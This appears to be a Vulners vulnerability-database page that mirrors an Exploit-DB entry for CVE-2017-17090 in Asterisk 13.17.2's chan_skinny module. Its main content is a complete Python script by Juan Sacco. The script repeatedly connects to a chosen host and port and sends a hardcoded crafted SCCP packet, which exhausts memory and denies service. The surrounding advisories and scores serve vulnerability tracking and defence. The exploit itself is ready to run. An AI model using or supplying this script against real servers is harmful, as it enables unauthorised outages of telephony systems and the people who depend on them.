Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption

🗓️ 07 Feb 2018 00:00:00Reported by Juan SaccoType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 85 Views

Asterisk 13.17.2 'chan_skinny' Remote Memory Corruption vulnerability foun

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Asterisk 13.17.2 - chan_skinny Remote Memory Corruption Exploit
7 Feb 201800:00
zdt
Tenable Nessus		Asterisk 13.x < 13.18.3 / 14.x < 14.7.3 / 15.x < 15.1.3 / 13.13 < 13.13-cert8 Memory Exhaustion Remote DoS (AST-2017-013)
6 Dec 201700:00
nessus
Tenable Nessus		Debian DLA-1225-1 : asterisk security update
2 Jan 201800:00
nessus
Tenable Nessus		Debian DSA-4076-1 : asterisk - security update
2 Jan 201800:00
nessus
Tenable Nessus		Fedora 27 : asterisk (2017-66e9367f7e)
15 Jan 201800:00
nessus
Tenable Nessus		FreeBSD : asterisk -- DOS Vulnerability in Asterisk chan_skinny (e91cf90c-d6dd-11e7-9d10-001999f8d30b)
4 Dec 201700:00
nessus
Tenable Nessus		Linux Distros Unpatched Vulnerability : CVE-2017-17090
20 Aug 202500:00
nessus
Circl		CVE-2017-17090
7 Feb 201800:00
circl
CNVD		Digium Asterisk Open Source and Certified Asterisk 'chan_skinny' Denial of Service Vulnerability
4 Dec 201700:00
cnvd
Check Point Advisories		Digium Asterisk chan_skinny SCCP session Denial of Service (CVE-2017-17090)
9 Jan 201800:00
checkpoint_advisories
Rows per page
# Exploit Author: Juan Sacco <[email protected]> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer module
# CVE-2017-17090 -  AST-2017-013
#
# Tested on: Asterisk 13.17.2~dfsg-2
#
# Description: Asterisk is prone to a remote unauthenticated memory exhaustion
# The vulnerability is due to an error when the vulnerable application
# handles crafted SCCP packet. A remote attacker may be able to exploit
# this to cause a denial of service condition on the affected system.
#
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch
# helper thread: Cannot allocate memory
#
# Program: Asterisk is an Open Source PBX and telephony toolkit.  It is, in a
# sense, middleware between Internet and telephony channels on the bottom,
# and Internet and telephony applications at the top.
#
# Homepage: http://www.asterisk.org/
# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
#
# Example usage: python asteriskSCCP.py 192.168.1.1 2000

import binascii
import sys
import socket
import time

def asteriskSCCP(target,port):
    try:
        while 1:
            # Open socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Set reuse ON
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # Bind port
            s.connect((target, port))
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Connected to:"), target, port
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Establishing connection.. ")
            packet =
binascii.unhexlify(b'450002c50001000040067a307f0000017f000001001407d00000000000000000500220009a2b0000e4eea8a72a97467d3631824ac1c08c604e762eb80af46cc6d219a4cf65c13992b4a8af94cb5e87c14faf0254cba25af9fb33bd8d2a58e370e3a866639dfdec350875cfecfe068a16746963fffeee0fdcbac75eb4f09d625f3ae1b4a3eb2812e6f838e88b0d7d9881465a0faf45664df8008d4d6de1a5e20a9c97a71f57d3429e0b17db3aeb3bf516ca4e207a5c801d04132979508f267c7425a57fd0edd271b57ff9831b595b519e73404f170492ae3ad438d4aeca854e96c9dd56d2af3813b8de6b3d8d31d32c0e95be9cb3a5c6106f64c4f19cda2b55ad1471f3d63e1b1ca3c29f362def063ad9b29ea4d1c1fda5c2e4cf0ae75064c27411a2deb5fab11e6412cd5a4037f38779f0173fa1f2ca1740aa78fe37bc0a50f5619c7abba00f2957bf06770ff4d6c003d4533de19f51bcbbd9bbe0ceb3e17dd180e58ee2698998edca42e3d6a8079cc151b608e5bd5aff052e718e714b360f9b091894a5eeed34dafe41d27f19988b3e0ac5a6dd8947c3537ae31154e983cdbac0861afc500206e74030c9e452738ece13075df2dbebb8a1737ee3b4880bc6d428ee2d3d64f585e197dc63f30638a4c55cff0b8e6aa82dfdf199baabd92c10092414015fad5f08e9c816a4d028574ee5340c08b2fe65ca1e7ca907ea2ebd6661e01e9b9d39d5bdb3e3cebd58e96f97f487bb580bcf5447ac48a2ad5541ae0ddcc9ec1f9528f2c07316dbd760e91e3bddbd53fbf6987fdba0830bdb485524950b5611e18e5d517c0f3ae05aa2daec42a5c43eab07aa0018ab750dc6995adad6561cc8a0379f7a12d8e5e474df013459442801d6871c5820318d790833687619b70b0da74893ca441f177ab9e7d7a537c6ff4920c79631905c35167d8a6efc0c6bced9270691abc5b4de84f956f8c1d34f9ef3f0073dafce8c076c4d537e981a1e8ff6ed3e8c')

            # Log the packet in hexa and timestamp
            fileLog = target + ".log"
            logPacket = open(fileLog, "w+")
            logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " - Packet sent: " + binascii.hexlify(bytes(packet))+"\n")
            logPacket.close()

            # Write bytecodes to socket
            print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Packet sent: ")
            s.send(bytes(packet))
            # Packet sent:
            print(bytes(packet))
            try:
                data = s.recv(4096)
                print("[" + time.strftime('%a %H:%M:%S') + "]" + " - "+ "Data received: '{msg}'".format(msg=data))
            except socket.error, e:
                print 'Sorry, No data available'
                continue
        s.close()
    except socket.error as error:
        print error
        print "Sorry, something went wrong!"

def howtouse():
    print "Usage: AsteriskSCCP.py Hostname Port"
    print "[*] Mandatory arguments:"
    print "[-] Specify a hostname / port"
    sys.exit(-1)

if __name__ == "__main__":
    try:
        # Set target
        target = sys.argv[1]
        port = int(sys.argv[2])

        print "[*] Asterisk 13.17 Exploit by Juan Sacco <[email protected] "
        asteriskSCCP(target, port)
    except IndexError:
        howtouse()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Feb 2018 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 25
CVSS 37.5
EPSS0.80582
asteriskremote memory corruptionunauthenticateddenial of servicesccp packetvulnerabilitytcppbxtelephonyexploit packcve-2017-17090fuzzer moduleopen sourcetelephony toolkitmiddlewareinternetsocketexploitationtcp/tlshelper threadcannot allocate memory
85